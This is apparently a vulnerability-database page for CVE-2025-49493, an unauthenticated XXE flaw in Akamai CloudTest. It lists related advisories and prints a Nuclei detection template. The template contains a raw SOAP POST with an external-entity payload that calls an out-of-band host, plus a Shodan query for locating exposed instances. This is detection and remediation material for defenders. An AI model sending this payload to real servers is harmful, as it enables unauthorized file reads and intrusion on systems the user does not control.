| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Exploit for CVE-2025-49493 | 14 Jul 202502:05 | – | githubexploit | |
| Exploit for CVE-2025-49493 | 5 Jul 202513:32 | – | githubexploit | |
| The vulnerability of the Akamai CloudTest performance testing platform lies in the improper limitation of XML links to external objects, which allows attackers to compromise privacy. | 9 Jul 202500:00 | – | bdu_fstec | |
| CVE-2025-49493 | 30 Jun 202519:42 | – | circl | |
| Akamai CloudTest 代码问题漏洞 | 30 Jun 202500:00 | – | cnnvd | |
| CVE-2025-49493 | 30 Jun 202500:00 | – | cve | |
| CVE-2025-49493 | 30 Jun 202500:00 | – | cvelist | |
| EUVD-2025-19583 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-49493 | 30 Jun 202520:15 | – | nvd | |
| Akamai CloudTest XML Injection | 14 Jul 202500:00 | – | packetstormnews |
id: CVE-2025-49493
info:
name: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)
author: xbow,3th1c_yuk1
severity: critical
description: |
Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
impact: |
Unauthenticated attackers can exploit XXE injection to read arbitrary files from the server through malicious XML entities in SOAP requests.
remediation: |
Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later that properly disables external entity processing.
reference:
- https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
- https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
- https://nvd.nist.gov/vuln/detail/CVE-2025-49493
classification:
epss-score: 0.03395
epss-percentile: 0.87382
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2025-49493
cwe-id: CWE-611
cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"Akamai CloudTest"
vendor: akamai
product: cloudtest
tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev,vuln
http:
- raw:
- |
POST /concerto/services/RepositoryService HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
SOAPAction: ""
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(content_type, "text/xml")'
- 'contains(body, "XML stream")'
condition: and
# digest: 490a0046304402203c5d9bb1312d2140ce10b33b7783f8734b2a1323eb500137be96777732e8b25b02206f188daf053f480ef13bc57637424a4d6df3619f05706b824bbe114d5cdabc1c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation